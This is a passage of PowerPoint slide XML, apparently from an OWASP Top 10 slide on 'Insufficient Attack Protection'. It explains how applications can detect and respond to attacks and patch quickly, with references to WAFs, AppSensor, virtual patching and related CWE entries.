              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How quickly can you deploy a real or virtual patch to block continued exploitation of this vulnerability?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3581400"/>
            <a:ext cx="3383280" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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Am I Vulnerable to Attack?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detecting, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>responding to, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and blocking attacks makes applications dramatically harder to exploit yet almost no applications or APIs have such protection. Critical vulnerabilities in both custom code and components are also discovered all the time, yet organizations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frequently take </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>weeks or even months to roll out new defenses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It should be very obvious if attack detection and response isn’t in place. Simply try manual attacks or run a scanner against the application. The application or API should identify the attacks, block any viable attacks, and provide details on the attacker and characteristics of the attack. If you can’t quickly roll out virtual and/or actual patches when a critical vulnerability is discovered, you are left exposed to attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Be sure to understand what types of attacks are covered by attack protection. Is it only XSS and SQL Injection? You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>technologies like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>WAFs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RASP, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP AppSensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to detect or block attacks, and/or virtually patch vulnerabilities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="6400800"/>
            <a:ext cx="3383280" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId8"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP Article on Intrusion Detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP AppSensor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Automated Threats Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>OWASP Credential Stuffing Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>OWASP Virtual Patching Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>OWASP Mod Security Core Ruleset</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId14"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15" invalidUrl="http://projects.webappsec.org/w/page/13246938/Insufficient Anti-automation"/>
              </a:rPr>
              <a:t>WASC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16" invalidUrl="http://projects.webappsec.org/w/page/13246938/Insufficient Anti-automation"/>
              </a:rPr>
              <a:t>Article on Insufficient Anti-automation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="-57150">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>CWE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>Entry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>778 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t> Insufficient Logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>CWE Entry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>799 - Improper Control of Interaction Frequency</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="3581400"/>
            <a:ext cx="3383280" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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How Do I Prevent This?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are three primary goals for sufficient attack protection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detect Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Did something occur that is impossible for legitimate users to cause (e.g., an input a legitimate client can’t generate)? Is the application being used in a way that an ordinary user would never do (e.g., tempo too high, atypical input, unusual usage patterns, repeated requests)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Respond to Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Logs and notifications are critical to timely response. Decide whether to automatically block requests, IP addresses, or IP ranges. Consider disabling or monitoring misbehaving user accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Patch Quickly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> If your dev process can’t push out critical patches in a day, deploy a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>virtual patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> that analyzes HTTP traffic, data flow, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and/or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code execution and prevents vulnerabilities from being exploited.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Insufficient Attack Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1014596"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="1014596"/>
            <a:chExt cx="6380328" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="304800" y="1014596"/>
              <a:ext cx="6380328" cy="585604"/>
              <a:chOff x="304800" y="997424"/>
              <a:chExt cx="6380328" cy="585604"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50"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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>          Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="51" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="60" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="144" y="1344"/>
                  <a:ext cx="192" cy="192"/>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p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="61" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="62" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="63" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="64" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1632"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
